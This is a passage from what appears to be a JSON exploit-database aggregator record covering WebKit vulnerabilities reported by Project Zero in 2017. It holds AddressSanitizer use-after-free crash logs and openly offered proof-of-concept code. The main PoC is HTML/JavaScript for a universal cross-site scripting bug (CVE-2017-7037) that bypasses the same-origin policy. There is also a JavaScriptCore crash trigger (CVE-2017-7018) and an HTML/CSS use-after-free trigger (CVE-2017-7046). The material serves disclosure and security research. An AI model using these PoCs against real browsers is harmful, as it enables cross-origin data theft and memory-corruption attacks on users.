(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n \r\n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)\r\nfreed by thread T0 here:\r\n #0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)\r\n #5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)\r\n #6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)\r\n #7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)\r\n #8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)\r\n #9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)\r\n #10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)\r\n #11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)\r\n #12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)\r\n #13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)\r\n #14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)\r\n #15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)\r\n #16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)\r\n #17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)\r\n #18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)\r\n #19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)\r\n #20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)\r\n #21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)\r\n #22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\nShadow bytes around the buggy address:\r\n 0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd\r\n 0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa\r\n 0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==29516==ABORTING\r\n=================================================================\r\n-->\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28179", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-07-25T21:42:30", "description": "WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting. CVE-2017-7037. Webapps exploit for Multiple platform. Tags...", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42378", "href": "https://www.exploit-db.com/exploits/42378/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1240\r\n\r\nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.\r\n\r\nThe PoC shows to call a setter of another origin's object.\r\n\r\nPoC 1 - JSValue::putToPrimitive:\r\n-->\r\n\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n\r\n<!--\r\nPoC 2 - JSObject::putInlineSlow:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42378/"}, {"lastseen": "2017-07-25T21:42:21", "description": "WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling. CVE-2017-7018. Dos exploit for Multiple plat...", "published": "2017-07-25T00:00:00", "type": "exploitdb", "title": "WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "id": "EDB-ID:42373", "href": "https://www.exploit-db.com/exploits/42373/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234\r\n\r\nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).\r\n\r\nvoid flush(InlineStackEntry* inlineStackEntry)\r\n{\r\n\t...\r\n if (m_graph.needsScopeRegister())\r\n flush(m_codeBlock->scopeRegister()); <<--- (a)\r\n}\r\n\r\nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.\r\n\r\nPoC:\r\n-->\r\n\r\nfunction f() {\r\n (function () {\r\n \teval('1');\r\n \tf();\r\n }());\r\n\r\n throw 1;\r\n}\r\n\r\nf();\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42373/"}, {"lastseen": "2017-07-24T19:42:20", "description": "WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free. CVE-2017-7046. Dos exploit for Multiple platform. Tags: Use After Free", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:42365", "href": "https://www.exploit-db.com/exploits/42365/", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246\r\n\r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\nPoC:\r\n\r\n=================================================================\r\n-->\r\n\r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n\r\n<!--\r\n=================================================================\r\n\r\nASan log:\r\n\r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)\r\n #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)\r\n #3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) 